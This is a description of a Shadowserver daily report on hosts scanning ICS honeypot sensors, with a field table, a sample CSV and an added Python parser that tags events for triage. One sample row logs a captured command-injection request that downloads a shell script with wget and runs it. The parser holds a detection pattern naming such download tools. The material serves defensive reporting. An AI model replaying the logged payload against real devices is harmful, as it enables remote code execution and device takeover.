This report identifies hosts that have been observed performing scanning activity against Industrial Control System (ICS) sensors.
Description
Scanning for ICS devices may be a benign activity — for example, having to do with a research project, or performed by an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.
Other scans, however, may be part of network reconnaissance in the preparatory phase of an attack, or an attempt to exploit the devices being scanned.
Below is a description of a report based on data collected by SISSDEN ICS-aware honeypots. The basic information collected includes the source of the scan and the requests being sent, including the communication state and any other protocol-specific details, if available. Note that because the ICS sensors used are also HTTP-aware, observed scans may also include non-ICS related attacks that happen to hit these sensors as well. These may be considered false positives from an ICS-related attack perspective, but they may be attacks in themselves too.
Fields
| Field | Description |
| --- | --- |
| timestamp | Time that the scan was performed in UTC+0 |
| ip | The IP address performing the scan |
| port | The source port used in the scan |
| asn | ASN announcing the scanning IP |
| geo | Country where the scanning IP resides |
| region | State / Province / Administrative region where the scanning IP resides |
| city | City where the scanning IP resides |
| hostname | PTR record of the scanning IP |
| protocol | Protocol used to query the ICS device, e.g. http, modbus, s7comm |
| type | Type of activity observed, i.e. ics-scan |
| dst_ip | The IP address of the target device |
| dst_port | Destination port used in the scan |
| dst_asn | ASN announcing the target IP |
| dst_geo | Country where the target IP resides |
| dst_dns | FQDN of the target, if applicable and recorded |
| naics | North American Industry Classification System code of the scanning IP |
| sic | Standard Industrial Classification code of the scanning IP |
| sector | Sector the attacking IP belongs to |
| dst_sector | Sector the target IP belongs to |
| public_source | Source of the data, for cases where the source accepts being credited |
| sensorid | ID of the sensor (target device) |
| state | Connection state (if applicable) |
| slave_id | Modbus slave id being requested (if applicable) |
| function_code | Modbus function code being used (if Modbus query) |
| request | Request logged |
| response | Response to the query |
Delivery Mechanism
The report is sent out daily via The Shadowserver Foundation’s free victim remediation reporting service. All events coming from SISSDEN are clearly marked as “SISSDEN” for every event reported.
Sample Report
"timestamp","ip","port","asn","geo","region","city","hostname","protocol","type","dst_ip","dst_port","dst_asn","dst_geo","dst_dns","naics","sic","sector","dst_sector","public_source","sensorid","state","slave_id","function_code","request","response"
"2018-09-16 00:00:54","198.51.100.5",56066,3462,"TW","KEELUNG CITY","KEELUNG","5.dynamic-ip.example.net","http","ics-scan","203.0.113.10",80,39324,"FI",,518210,737415,"Communications",,"SISSDEN","000a14be-2fd9-408f-a855-fd7f984f6bca",,,,"('/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.15/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$', ['Connection: keep-alive\r\n', 'Accept-Encoding: gzip, deflate\r\n', 'Accept: /\r\n', 'User-Agent: Hakai/2.0\r\n'], None)",404
"2018-09-16 06:16:38","198.51.100.20",53757,10439,"US","CALIFORNIA","SAN DIEGO","ubuntu16193.example.com","modbus","ics-scan","203.0.113.77",502,36352,"US",,0,0,"Communications","Commercial Facilities","SISSDEN","0015bab9-528b-4654-9909-45d5e53163c0","NEW_CONNECTION",,,,
"2018-09-16 11:46:46","198.51.200.30",1128,57509,"CY","LEFKOSIA","NICOSIA",,"s7comm","ics-scan","203.0.113.99",102,9009,"NO",,0,0,,,"SISSDEN","8b3d7782-2ccd-4ee9-a1f3-83f12014cf27","NEW_CONNECTION",,,,
"2018-09-16 23:51:13","198.51.200.50",60565,26599,"BR","SAO PAULO","ITAPEVI",,"http","ics-scan","203.0.113.105",80,15626,"UA",,0,0,,,"SISSDEN","c010c930-fdbc-458c-b82d-d872d3ef206d",,,,"('/', ['Host: 203.0.113.105:80\r\n', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\n', 'Content-Length: 0\r\n'], '')",302
"2018-09-16 23:29:47","198.51.200.75",214,57043,"RU","KALUZHSKAYA OBLAST","OBNINSK",,"s7comm","ics-scan","203.0.113.199",102,133398,"HK",,0,0,,"Communications","SISSDEN","0fdd59a3-a48d-4d6f-a9c4-a8ee3320575d","NEW_CONNECTION",,,,
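To show how the fields described above and the sample report are consumed on the receiving side, here is an added Python example; it is not part of the SISSDEN or Shadowserver report tooling. It parses three of the sample records (copied from the report above), converts the optional Modbus columns to typed values, decodes the HTTP `request` column (a Python-repr tuple of path, header lines and body) with `ast.literal_eval` so that nothing in it can execute, and tags each event so that HTTP hits that are really non-ICS attacks can be separated from genuine Modbus/S7comm probes, as the description's false-positive caveat suggests. The `ICS_PROTOCOLS` set and the `INJECTION_RE` heuristic are this example's own assumptions, not definitions from the report.

```python
import ast
import csv
import io
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import unquote

# Header plus three records copied from the page's sample report (documentation-range
# addresses as used there). Raw string: the request column carries the literal
# characters "\r\n" inside a Python-repr value, and they must survive as written.
SAMPLE_REPORT = r""""timestamp","ip","port","asn","geo","region","city","hostname","protocol","type","dst_ip","dst_port","dst_asn","dst_geo","dst_dns","naics","sic","sector","dst_sector","public_source","sensorid","state","slave_id","function_code","request","response"
"2018-09-16 00:00:54","198.51.100.5",56066,3462,"TW","KEELUNG CITY","KEELUNG","5.dynamic-ip.example.net","http","ics-scan","203.0.113.10",80,39324,"FI",,518210,737415,"Communications",,"SISSDEN","000a14be-2fd9-408f-a855-fd7f984f6bca",,,,"('/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.15/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$', ['Connection: keep-alive\r\n', 'Accept-Encoding: gzip, deflate\r\n', 'Accept: /\r\n', 'User-Agent: Hakai/2.0\r\n'], None)",404
"2018-09-16 06:16:38","198.51.100.20",53757,10439,"US","CALIFORNIA","SAN DIEGO","ubuntu16193.example.com","modbus","ics-scan","203.0.113.77",502,36352,"US",,0,0,"Communications","Commercial Facilities","SISSDEN","0015bab9-528b-4654-9909-45d5e53163c0","NEW_CONNECTION",,,,
"2018-09-16 23:51:13","198.51.200.50",60565,26599,"BR","SAO PAULO","ITAPEVI",,"http","ics-scan","203.0.113.105",80,15626,"UA",,0,0,,,"SISSDEN","c010c930-fdbc-458c-b82d-d872d3ef206d",,,,"('/', ['Host: 203.0.113.105:80\r\n', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36\r\n', 'Content-Length: 0\r\n'], '')",302
"""

# Assumption of this example: protocols the sensors treat as ICS-native.
ICS_PROTOCOLS = {"modbus", "s7comm"}

# Assumption of this example: a shell separator followed by a download/exec tool in
# the URL-decoded request path marks a generic command-injection attempt, not an ICS probe.
INJECTION_RE = re.compile(r"[;|`]\s*(?:wget|curl|tftp|busybox|sh)\b")


def _opt_str(value: str) -> Optional[str]:
    return value if value != "" else None


def _opt_int(value: str) -> Optional[int]:
    return int(value) if value != "" else None


@dataclass
class IcsScanEvent:
    timestamp: str
    ip: str
    port: int
    asn: int
    protocol: str
    dst_ip: str
    dst_port: int
    state: Optional[str]
    slave_id: Optional[int]
    function_code: Optional[int]
    request: Optional[str]
    response: Optional[str]
    raw: dict = field(default_factory=dict)  # every column exactly as delivered


def parse_report(text: str) -> list:
    """Parse the report CSV; the csv module handles the commas inside the quoted request column."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append(IcsScanEvent(
            timestamp=row["timestamp"], ip=row["ip"], port=int(row["port"]), asn=int(row["asn"]),
            protocol=row["protocol"], dst_ip=row["dst_ip"], dst_port=int(row["dst_port"]),
            state=_opt_str(row["state"]), slave_id=_opt_int(row["slave_id"]),
            function_code=_opt_int(row["function_code"]),
            request=_opt_str(row["request"]), response=_opt_str(row["response"]), raw=row))
    return events


def decode_http_request(request: str):
    """HTTP requests are logged as the repr of (path, [header lines], body).
    ast.literal_eval only evaluates literals, so attacker-controlled content cannot run."""
    path, header_lines, body = ast.literal_eval(request)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()  # strip() also drops the trailing CRLF
    return path, headers, body


def classify(event: IcsScanEvent) -> str:
    """Tag an event: genuine ICS-protocol probe, HTTP command injection, or generic HTTP hit."""
    if event.protocol in ICS_PROTOCOLS:
        return "ics-protocol-probe"
    if event.protocol == "http" and event.request:
        path, _, _ = decode_http_request(event.request)
        if INJECTION_RE.search(unquote(path)):
            # A non-ICS attack that merely reached the HTTP-aware sensor (the page's caveat).
            return "http-command-injection"
        return "http-generic"
    return "other"


def summarize(text: str) -> dict:
    """Count events per tag, the number a report consumer would triage by."""
    return dict(Counter(classify(e) for e in parse_report(text)))


if __name__ == "__main__":
    for ev in parse_report(SAMPLE_REPORT):
        print(ev.timestamp, ev.ip, ev.protocol, ev.dst_ip, ev.dst_port, classify(ev))
    print(summarize(SAMPLE_REPORT))
```

Because the Modbus and S7comm records in the sample carry only `NEW_CONNECTION` and no `slave_id` or `function_code`, those columns are read as optional; when a report does include them, the typed values are what a consumer would key on to tell a read-only scan from a write attempt. Run the file directly to print one tagged line per record and the tag counts.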